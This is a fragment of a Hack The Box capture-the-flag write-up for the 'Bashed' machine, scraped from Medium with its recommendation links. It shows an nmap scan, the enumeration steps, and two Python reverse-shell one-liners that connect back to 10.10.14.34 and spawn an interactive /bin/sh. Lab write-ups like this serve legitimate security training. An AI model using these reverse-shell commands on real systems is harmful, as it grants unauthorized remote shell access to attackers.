Bashed — Hack The Box WriteUp

nmap -p- [bashedIP]
  1. A deeper nmap scan (with the -A, -T4 and scripts options).
  2. Explore the web page ourselves (for potential areas for SQL injections or anything else).
  3. Start a directory buster on the IP since it is hosting a web server.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.34",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.34",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to make the most of CyberStart Essentials!

How to Claim AQR Tokens

Visa looks at offline payments for digital currencies

Shade Protocol is an array of connected privacy-preserving DeFi applications built on Secret…

Friends! RusCoin fund tokens were issued today on Binance Smart Chain (BSC) Issue volume of 5…

Bitmart will be paying out compensation to the victims affected from the $150 million hack

Spy On Windows Machines Using Metasploit

4 Ways to Spot Identity Thieves — and 2 Ways to Stop Them

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
VulnHunter

VulnHunter

More from Medium

Walkthrough for Hack-The-Box Lame

HackTheBox — Shibboleth Writeup

TRYHACKME SOURCE WRITEUP

TryHackMe: Windows Forensics 1 Walkthrough